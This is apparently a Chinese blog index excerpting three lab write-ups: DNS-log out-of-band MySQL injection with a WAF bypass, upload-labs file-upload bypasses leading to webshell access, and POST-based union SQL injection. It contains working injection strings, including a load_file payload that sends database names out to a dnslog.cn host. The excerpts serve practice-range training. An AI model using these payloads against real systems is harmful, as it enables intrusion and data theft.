zkaq-数据库注入
MYSQL 注入 - Dns注入前置知识1.dnslog 1用来记录dns被解析的信息 2.dns注入思路 进行注入攻击时,页面无正常回显,使用第三方dnslog平台,通过记录dns解析的信息外带注入数据,将盲注转化成显错注入。 靶场实践判断是否存在注入攻击时遇到waf 使用参数污染进行绕过 构造 1id=2/*&id=1 and sleep(3) -- a*/ //页面延时响应,判断存在注入点 爆库名 构造 1id=2/*&id=1 and (select load_file(concat("\\\\",database(),".zlmwoy.dnslog.cn\\1.txt"))) -- a*/ 爆表名 构造 1234id=2/*&id=1 and (select load_file(concat("\\\\",(select table_name from information_schema.tables where table_schema=database()...
zkaq-upload-labs
Pass-01 前端检测文件格式,不允许上传PHP文件 bp抓包,改名 冰蝎连接 Pass-02上传文件,抓包,修改 Content-Type 冰蝎连接 Pass-03不允许上传”.asp”、”.aspx”、”.php”、”.jsp”文件 上传文件抓包 冰蝎,连接 Pass-04线上传一个.htaccess文件 该文件“告诉”后端服务器,将jpg文件当做php文件执行 上传将php一句话木马文件后缀改为jpg 上传 Pass-05大小写绕过 文件改名,后缀用大写。 冰蝎连接 Pass-06文件后缀空格绕过 冰蝎连接 Pass-07文件尾加.绕过 冰蝎连接 Pass-08 冰蝎连接,连接时将 ::$DATA...
zkaq-SQL
post注入post传参类型的注入,与get注入很像。post注入经常出现在登录框且通常是字符型。 靶场演练Pass-051构造' or 1=1 -- a 成功登录,判断的我们的输入的数据有被当做SQL语句执行。 构造 12' or 1=1 order by 3 -- a登录成功' or 1=1 order by 4 -- a登录失败 判断页面有三个字段 暴库名 构造 1'union select 1,2,database() -- a 暴表名 构造 1'union select 1,2,table_name from information_Schema.tables where table_schema=database() limit 0,1 -- a 暴字段 构造 1'union select 1,2,column_name from information_Schema.columns where table_schema=database() and...








